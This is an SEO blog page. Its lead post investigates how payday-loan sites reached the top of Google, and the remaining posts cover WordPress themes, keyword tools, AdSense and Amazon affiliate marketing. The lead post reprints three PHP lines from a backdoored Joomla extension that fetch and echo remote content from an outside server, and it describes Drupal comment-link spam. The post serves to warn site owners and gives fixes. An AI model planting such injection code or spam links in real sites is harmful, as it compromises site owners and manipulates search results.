SEO Tools | Online Business Marketing Tools

How To Succeed With Your Online Business

SEO Tools | Online Business Marketing Tools header image 2

3 Lines Of Code to Rank a Website to #1 on Google

February 17th, 2013 · seo training, Technology

by John Doyle on 05 February 2013
Life in SEO is never boring.  We are constantly researching the best methods to keep us up to date and providing the best service we possibly can.  We are continuously reading, experimenting and discussing the ever changing way in which the way the web is organised.
One of our many experiments involved several of our SEO team getting assigned random keywords, picked from a selection, to monitor in the SERPS.  We would then monitor the rankings over a period of weeks to look out for interesting and unusual ranking behaviour.  Whilst I got what turned out to be the very uninteresting “Cheap Mobile Phones” (although I did purchase the fantastic Samsung Galaxy S3 during this time), another member of our team, Paul, got “Payday Loans”.  This turned out to be a fascinating thing to research.  Paul did a fantastic job in monitoring this and when he showed us the results, we were amazed by what we saw.

Discovering the Manipulation

sHCwoxLl 3 Lines Of Code to Rank a Website to #1 on Google
The above graph shows us the top 20 rankings for the keyword “Pay Day Loans” between 12th December 2012 and 21st January 2013.
What this graphs shows is fascinating.  What we are seeing is almost a completely different set of results every day.  If we compare this to a relatively normal set of results for another set of keywords “Cheap flights”, it is obvious that there is something quite unusual going on.
AhMhG07l 3 Lines Of Code to Rank a Website to #1 on Google
I was intrigued about this and decided to investigate further.
Using ahrefs.com, I was able to study the sites which are linking to the pay day loan sites which are ranking in Google.  I found that the pay day loan companies are using domain names only a few days old, they are then gaining thousands of links to that domain in a very short amount of time, mainly with exact match anchor text.  It appears Google sees these links appearing in a short amount of time as a massive ranking factor and boosts the domain straight to or near the top of the results.
This could be perfectly acceptable and natural if a site goes viral all of a sudden, but that is not the case here.  The links and methods used to get the links are very unnatural and it is quite disturbing.
I found two common methods being used by several pay day loan companies to boost their site, or a clone of their site, to the top of the rankings in Google.co.uk.

Method 1: Joomla Hidden Links

The first involves Joomla.  Joomla has been downloaded over 30 million times as of March 2012.  It is the second most commonly used CMS on the internet after WordPress.  It has over 10,000 extensions available.  An extension or plugin is additional code written by a third party which creates additional functionality for the CMS.  It was one of these extensions that was being exploited to dominate the top result for “Pay day loans” on Google (at the time of writing).
The module in question is called “AddThis for Joomla”, developed by INowWeb.com and has been voted one of the top 20 extensions for Joomla.  It adds the popular social media sharing buttons to a website.  INowWeb.com appears to have gone rogue or has suffered some sort of massive security breach.  The website is mostly currently unavailable, many pages that did exist now return a 404 and the homepage just returns a blank white page, but further pages are certainly returning information.  The extension contains malicious code which injects a hidden link into a website, which is obscured using Javascript and pushed off the viewable page using CSS.  Once the extension is installed, it allows the hacker to load whatever code they want into any website which has this extension installed, which appears to be many thousands.  They can change the link whenever they like, giving them the ability to get a link on the homepage of thousands of sites almost instantly.  The code is generated on the INowWeb.com website and then fetched by the extension.   The URL to fetch the code contains parameters telling it which site is infected by the malicious code as shown below.  I have hidden the URL of the infected website, but I have contacted them and instructed them on how to fix it.
FswTTPVl 3 Lines Of Code to Rank a Website to #1 on Google
At time of writing, payday-mom.co.uk is top of Google for “pay day loans”.  This site has many thousands of links pointing to it, including .gov and .edu domains, using the above method.  It has been top of Google for at least a week whilst I’ve been monitoring, this shows how effective this method is and makes you wonder why Google has not done anything about it.
The extension was published on the official Joomla extensions website for a length of time allowing it to be downloaded by thousands of people.  It has since been removed and replaced with a message saying the extension is under investigation with code UR7, fraud or unethical practises.
LspjW6Hl 3 Lines Of Code to Rank a Website to #1 on Google
bv8jqV5 3 Lines Of Code to Rank a Website to #1 on Google
If you have this extension installed, remove it immediately.  This should be enough to delete any code you don’t want, but it’s worth a check of your source code to be sure.
Once that domain has eventually been found out and removed from the rankings, the process starts again.  It takes very little time as they have their thousands of hacked sites ready, waiting for their updated code and the new domain is back to the top of Google in a matter of days.
Inowweb.com may not be aware of the problems associated with their website and extensions, the site may have been victim of a massive security breach.  I am returning the actual data I’ve found which may or may not have come from them.

3 Lines of Code to Rank a Website to #1 on Google

After several e-mails to webmasters affected by the infected code, I managed to get a hold of a copy of the malicious file.  Three lines are all it takes to bump a site to number 1 in Google in an extremely highly competitive market.  These lines are extremely simple.
  1. $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; This assigns the websites URL to the variable $path.
  2. $credit=file_get_contents(‘http://www.inowweb.com/power.php?i=’.$path); This is the sneaky bit of code, it connects to the rogue website and grabs the link they would like to display on the infected website, and then assigns the code to the variable $credit.  It also tells the rouge website, the URL of the infected website using the $path variable it generated in the above line.
  3. echo $credit; A simple command to display the code from the rogue website on the infected website disguised as a variable called $credit presumably to make it look like it is just displaying the everyday credit real extensions use.
As you do not need to register on the Joomla extension website to download extensions, there is presumably no way to know exactly who has installed this extension and inform them of the problem.  Until the webmaster finds out, the malicious user has control over their website to pretty much do what he or she wants.  Being able to link to one website from thousands of websites instantly is a massively powerful and dangerous tool.  Many of the websites infected are government or education websites, which shows how widespread this problem is.

Method 2: Leaky Drupal Blog Comments

Drupal is another extremely popular CMS.  It is used on an estimated 2.1% of websites across the world, including The Official White House website and a UK Government Website, data.org.uk.
In the latest version of Drupal, the default install configures the site in a way where any new user requires administrator approval before they can use their account.  This can be very labour intensive so is often turned off.  Once it is turned off, spammers can register as many accounts as they like without the administrator of the site receiving any automatic warnings.
Drupal allows the posting of comments on articles posted.  These comments allow some basic HTML by default, including hyperlinks.  These hyperlinks are the cause of almost every result in Google’s top 20 results for the keyword “pay day loans”.  The hyperlinks do not contain a nofollow attribute which means that a spammer may post as many links in these comments to the pay day site as they want, and Google will treat them as ranking links.  It is good practice to automatically add the nofollow attribute to places where an everyday user can post to deter spammers.  Anywhere that allows the general public to post links that do not add the nofollow attribute will quickly become hijacked by spammers.
UO2ayOil 3 Lines Of Code to Rank a Website to #1 on Google
Personally I find it amazing that Drupal does not include the nofollow attribute by default.  Any site that does not fix this will become a spam magnet as is shown by investigating the back links of many of the pay day loan sites.
Recent versions of Drupal do now have a configuration option which allows you to include the nofollow attribute to any posted external links.  Instructions to do this can be found at http://drupal.stackexchange.com/questions/18211/how-to-apply-the-attribute-rel-nofollow-to-links-in-the-comments.  I would also recommend employing strict automated moderation over any article comments, if you need to have them enabled.
It is quite clear that Drupal is used as the major tool to place these hyperlinks to any unscrupulous pay day loan sites and is a clear indication that Drupal needs to tighten their default installation and include more automated moderation. 15 of the top 20 results in Google, at time of writing, have many hundreds, if not thousands, of backlinks from comments on Drupal websites.  It is quite simple to check this yourself using ahrefs.com.  Eg. https://ahrefs.com/site-explorer/refdomains/subdomains/payday-loans4you.co.uk.  You will be able to see five backlinks of a pay day loan site with that link if you do not have a ahrefs.com account, or the full list if you are a subscriber.

What can I do about it?

No matter which Content Management System (CMS) you are using, you are potentially vulnerable to such an attack.  Open source CMS’ particularly will be vulnerable as the source code is available to the general public who can then examine it for any security holes which they could exploit.  Most of the most commonly used CMS’ are safe to use if they are installed and configured correctly.  There are many guides online with instructions on how to configure these CMS’ to be secure and safe to use effectively.
Always do your research before installing 3rd party code.  Check out any reviews and blogs people may have wrote about the extension/plugin/module.  If you have any coding experience, take a look through and make sure that there is nothing malicious going on in there or ask a web developer to check it out for you.   Always download them from official sites.  Although the Joomla extension I have written about was available from the official site, it is still the safest place to get them from and they are quickly removed once a problem has been discovered.

Why doesn’t Google do something about it?

I’m sure there are many conspiracy theorists out there who believe that Google is well aware of what is happening with these corrupt results on their search engine, but does little about them so that genuine companies have to pay through their nose to be listed in the sponsored ads so they have any chance of being listed in a prominent position.
I think the truth is that there are far more people working on ways to exploit the search results than there are working on ways to stop them.  Google release hundreds of updates to its algorithm every year so eventually they will make it harder for these rogue companies.  They can also take manual action against these sites, but it appears they are very slow to do this, even with the obvious ones.  As I’ve already mentioned, the same site has been number one in the rankings the whole time I’ve spent researching this blog.  All of the links are formatted quite similarly so it shouldn’t take much tweaking to discount them all.  Google seem to remove domains from the rankings quite regularly, but it takes a matter of days for a company to repeat the process with a new domain that costs pennies to register.  Maybe the conspiracy theorists are at least partially correct?
There is no doubt that these rogue companies will be affecting the business of legitimate pay day loan companies.  They can also be dangerous to use as they do not follow the same regulations as legitimate companies.
Have you been affected by spam on your website?  What do you think about Google’s methods of dealing with this scam?  Are these rogue companies affecting your legitimate pay day loan company?  Let us know below.

→ No CommentsTags: ····

How to Change a WordPress Theme to improve your search engine results

February 5th, 2013 · affiliate marketing, internet marketing, Monetize Your Website, seo tips, Wordpress

How to Change your WordPress Theme


For more more videos on How to Make Money Online, please click on the link.

If you want more information on how to do Affiliate Marketing and make money at your home business, please leave a comment.

Setting up a website for your online business is so important now a days, it is worth your effort to select a website which is easy to update, looks good, has some search engine optimization to allow your website to attract targeted internet traffic so you get a lot of internet visitors buying your products. If you run a home business or you are into affiliate marketing, having targeted internet traffic, meaning people visiting your site using long tailed keywords ready to buy products rather than just browsing the web searching for information, you want to review some of the training videos on my SEOTools4You Youtube channel to learn how to make your website stand out and attract many internet visitors.

I have selected WordPress as a website software package because it is easy to setup and install, has many plugins and themes to enhance your website look and feel, and performs well when setting a website up for search engine optimization.

Please leave any comments or suggestions in the comments area below.
Also, if you like this video, click on the LIKE link. It certainly helps.

Thanks for watching. If you want any videos created on a certain Online Business topic, just leave a comment.

→ No CommentsTags: ·····

I Wonder Where Google’s Wonder Wheel Went?

January 16th, 2013 · Contextual Targeting Tool, internet traffic, seo tips

Keyword research is a critical component to a solid and rounded SEO strategy.  When you break it down, you need to know what people are searching for in order to target the right terms.  Keyword research fuels your content generation strategy.  I use a wide range of tools when conducting keyword research and each has its own purpose.  In the past, one of my favorite free tools was Google’s Wonder Wheel.  You’ll notice the word “was” in the last sentence.  That’s because Google shut down the tool last year, while many search engine marketers screamed a collective “NO!!” while it was happening.

Kindle Fire HD 7″, Dolby Audio, Dual-Band Wi-Fi, 16 GB – Includes Special Offers I Wonder Where Googles Wonder Wheel Went?

Many people in the industry used Wonder Wheel to visually find related keywords, which often helped expand your keyword research (down the right path based on data).  Wonder Wheel’s related terms were based on Google data (same session searches), so you knew the terms being displayed made sense.  Also, the visual nature of wonder wheel made it very interactive and easy to use, while returning a smart path for search engine marketers performing keyword research.

As you clicked a word, related terms appeared around that term. As you clicked related terms, it became the anchor word, with more terms appearing around it.  So on and so forth.  It was a phenomenal way to find related keywords in an interactive and visual way.  Needless to say, we all missed the Wonder Wheel.

An example of using Google Wonder Wheel to find related searches:
wonder wheel example2 I Wonder Where Googles Wonder Wheel Went?
Image from Tech Source

Alternatives, and Confirmation at the Google Agency Summit
I had the opportunity to attend the Google Agency Summit last week in New York City at Google Headquarters.  It was a great day packed with presentations covering the latest in Mobile, Video, Analytics, Social, etc.  One of the first presentations was by Jordan Rost covering some of the free research tools that Google provides for marketers.  As Jordan was covering Google Correlate, I asked if it could be used in a similar way to the old Google Wonder Wheel.  He shot me a quick look and said, “Not exactly, but I’m getting to the Wonder Wheel soon.”  Needless to say, I was excited to learn more!

The Contextual Targeting Tool
I do a lot of paid search work, so I’m extremely familiar with the Contextual Targeting Tool (CTT).  But it seems the CTT contains a surprise that many search marketers don’t know about.  Sure, it was often listed as an alternative to Wonder Wheel, but was it a solid replacement?  Does it provide the same great same session data we were getting from Wonder Wheel?

Well, Jordan explained that the Contextual Targeting Tool is run by the same engine that fueled Wonder Wheel.  Note, I’m not referring to a similar type of engine.  It’s the exact engine that ran the Wonder Wheel!  That’s awesome news, and it was great to receive confirmation of this.

Sure, it’s not as visual as Wonder Wheel, but it can still yield the same results.  So, I’m going to walk you through a quick example of finding related terms by using the Contextual Targeting Tool below.  Again, the purpose of Wonder Wheel was to find related terms, based on actual Google data.  Let’s dig in.

An example of using the Contextual Targeting Tool in place of Wonder Wheel:
Let’s say you focused on computer security and you were just beginning keyword research.  You know several keywords and categories you want to target, but want to find related terms, based on Google’s wealth of data.  That’s a smart move, since you don’t want to leave keywords (and targeted traffic) on the table.

Let’s head over to the Contextual Targeting Tool to do some research.

1. Log into AdWords, click the Tools and Analysis tab, and then select Contextual Targeting Tool.  Note, the primary purpose of the tool is to help search engine marketers build tight themes of keywords for Display Network campaigns.  But, we’re going to use it as a replacement for the Wonder Wheel in this example.

contextual targeting tool find I Wonder Where Googles Wonder Wheel Went?

2. In the text field at the top of the page, enter “computer security” without quotes.

contextual targeting tool I Wonder Where Googles Wonder Wheel Went?

The CTT will display several rows of data containing related keywords, based on the initial keyword you entered.  You will see the anchor keyword on the left and then five related keywords in each row.  This is where you can start to gain great ideas for related terms.  Again, these keyword grouping are being driven by the Wonder Wheel engine.

2. In our example, I see “internet security”.  Maybe I didn’t know people were searching for that keyword, in addition to “computer security”, and I want to use that term as our keyword anchor (to find more related searches).  When I enter that term in the text field, I now get more rows of data, based on that new keyword.

contextual targeting tool2 I Wonder Where Googles Wonder Wheel Went?

3. I now see “internet security software” in the list, and decide to use that as my anchor.  I enter that word in the text field and I now see more terms related to this specific keyword, including “security rating”.  Interesting… I wasn’t going to focus on that while building out content.  Let’s go down that path now…

contextual targeting tool2a I Wonder Where Googles Wonder Wheel Went?

4. You can also click the plus sign (+) to expand a certain category, which will reveal additional rows with related keywords.

contextual targeting tool expand2 I Wonder Where Googles Wonder Wheel Went?


Valuable and Addictive
You can see how this can become both valuable and addictive.  icon smile I Wonder Where Googles Wonder Wheel Went?   Sure, this isn’t as visual as Wonder Wheel, and it takes a few extra steps, but the data is the same.  To me, running through this exercise is an essential component to performing thorough keyword research.

Let’s face it, you won’t know every keyword that people are searching for.  Actually, many people are too close to their own industries, products, and services to know how the average person is searching.  Using Wonder Wheel, I mean the Contextual Targeting Tool, you can find some gems that you might never uncover normally.  That’s why I love this functionality.

Summary – Long Live Wonder Wheel!
Again, this is the same engine that fueled Wonder Wheel, and that’s confirmed by Google.  So, if you are performing keyword research, I highly recommend you check out the Contextual Targeting Tool for uncovering related searches.  Like I said earlier, don’t leave keywords and targeted traffic on the table.  Now, if Google would only bring back the slick visual UI of Wonder Wheel!

→ No CommentsTags: ·····

What’s the difference between Hosted AdSense for Content and AdSense for Content?

December 29th, 2012 · Google Adsense, Google Adsense, Monetize a Blog, Monetize Your Website

Google Adsense

I have been checking my stats on my Google Adsense account and have 21% Adsense for Content and 79% Hosted Adsense for Content. Just exactly what does this mean?  I would like to know how much more information can I extract from the information displayed in the Google Adsense pages?

Hosted AdSense for Content = YouTube

AdSense for Content = ads on your website or blog
So, looking at my 21/79 split between Adsense for Content and Host Adsense for Content, it looks like my YouTube is out performing my ads placed on my websites and blogs. This is an interesting stat as I have over the years spent a lot more time setting up my 200 or so blogs and websites then my 200 or so videos that I have placed up on YouTube. YouTube being the third highest ranked site behind Facebook and Google, and owned by Google, YouTube is an ultimate source of internet traffic, but times are changing and YouTube are becoming more strict with what is being loaded up to YouTube.  As I said, it is worth your while to read up on the YouTube TOS changes and become familiar with what you can monetize and what is going to be rejected by YouTube.
Just a quick update, I checked my Hosted AdSense for Content verses my AdSense for Content just recently, 22nd of February, 2013, and the split is now 19%/81% for Hosted AdSense for Content. This would indicate my AdSense hosted on my YouTube videos is performing better or has increase ground on my Adsense hosted on my websites. An interesting statistic. Now I would investigate why there has been this change and optimize either my videos for more traffic. I love this stuff.
Furthermore, if you are recording xBox 360 Call of Duty Black Ops 2 game play such as Hitman Absolution walk through or Halo 4 game play, you might want to check out the latest information on monetization of video game play. I know from personal experience, YouTube is reviewing and rejecting video monetization more often these recent days. It is worth doing a bit a research before spending a lot of time recording and uploading videos expecting to make some money from these videos.
If you want to monetize video game and/or software content, take a look at Google’s Help Center article http://support.google.com/youtube/bin/answer.py?hl=en&answer=138161
For the time being, I am building up traffic to my game play  videos and using some YouTube traffic tactics to get targeted traffic to my blog at www.xboxreviewonline.com.  If you are interested in learning about some of my YouTube Traffic Tactics, leave a comment.

→ No CommentsTags: ···

GoPro Hero3 and How to do Research for Amazon Associates Affiliate Marketing?

October 20th, 2012 · affiliate marketing, Amazon Associates, Amazon Omakase Widget, making money online, Sell Amazon Products

I have been doing some affiliate marketing research as suggested by Jeff Johnson on his NonStop Traffic Formula Training course. This time, I have been onto the Engadget site and found this incredible new small video camera called the GoPro Hero3. I have been using a Flip video camera for most of my videos (see my BodySuppsVideo YouTube Channel) but this HD HERO3 Silver Edition by GoPro is small, inexpensive and produces HD video. I think the idea is you can afford to have multiple Hero3 video cameras to get the different angles for making a ‘Pro’ video.

For More Information, Click Here!   HD HERO3 Silver Edition by GoPro GoPro Hero3 and How to do Research for Amazon Associates Affiliate Marketing?

So, getting back to Amazon Associates, first step is to join the Amazon Associates Program (amazon calls their affiliates “associates”) by going to: https://affiliate-program.amazon.com/. Once you have signed up, you can then log into your Amazon Associates account and navigate to any Amazon products and use the Associates Toolbars to create an affiliate link to any Amazon product selected. This link can be an image, text or image and text affiliate link and automatically includes your Amazon Associates affiliate id in the link.

Jeff’s training then goes onto how to research what to sell on Amazon Associates by either checking out the Amazon Best Sellers or find the “Next Big Thing” to hit the market. When you are looking at selling “Amazon Best Sellers“, this mean selling existing products that are already best sellers on Amazon, there are some Pros and some Cons in this methodology. First the Pros of selling Amazon Best Sellers are:

• Pros
– Easy to identify
– Built in market for the product
– Lots of people searching for the product
– Large selection of products to choose from – More keyword research available

• Cons
– More Competition
– Easier for someone to “knock you off” your strategy

The method of finding Amazon Best Sellers, is very easy to do. Just browse the site and look for the most popular items in each of the categories. Remember, Amazon is the largest online business in the world and sell just about everything. I remember when I first heard about Amazon, and they started selling just books. Now, Amazon sell everything, electronics, eBooks, music, clothes, shoes, you name it, Amazon sells it. Amazon even has a great 3rd party model of affiliate marketing where you can sell other products that are not a part of Amazon but part of third party businesses, and make a great commission in doing so. Back to the Amazon research.

How to find them on Amazon?
Every main product category has a “Bestsellers” link… browse dozens of categories and look at their Best Sellers. Keep a list of hot ideas. With selling the Amazon Best Sellers, try visiting many of the other categories to generate ideas in markets you’ve never thought of. Keep a list of your ideas to use later in your research.

When you are looking at selling “The Next Big Thing”, this mean selling hot products that are getting buzz in the media and haven’t hit the stores yet… or at least not in a “big way”. There are some Pros and some Cons in this methodology. First the Pros of selling Amazon’s  “The Next Big Thing”:

• Pros
– Less Competition
– Harder for someone to “knock off” your strategy
– Bigger Profit Margins (could mean higher commissions per unit)

• Cons
– Harder to identify
– Not guaranteed to be a Top Seller
– Fewer people searching for the product
– Fewer selection of products to choose from – Less keyword research available

When you want to market “The Next Big Thing”, here is how to find them. You search for the most popular blogs in the market and either look for their “what’s new” section, or their hottest, most popular recent posts. You can find the “The Next Big Thing” product for Amazon affiliate marketing on the most popular technology blogs, for instance at http://technorati.com/.
If you have found this post useful, please leave a comment. If you want to check out the HD HERO3 Silver Edition by GoPro, click on the link.

→ 4 CommentsTags: ······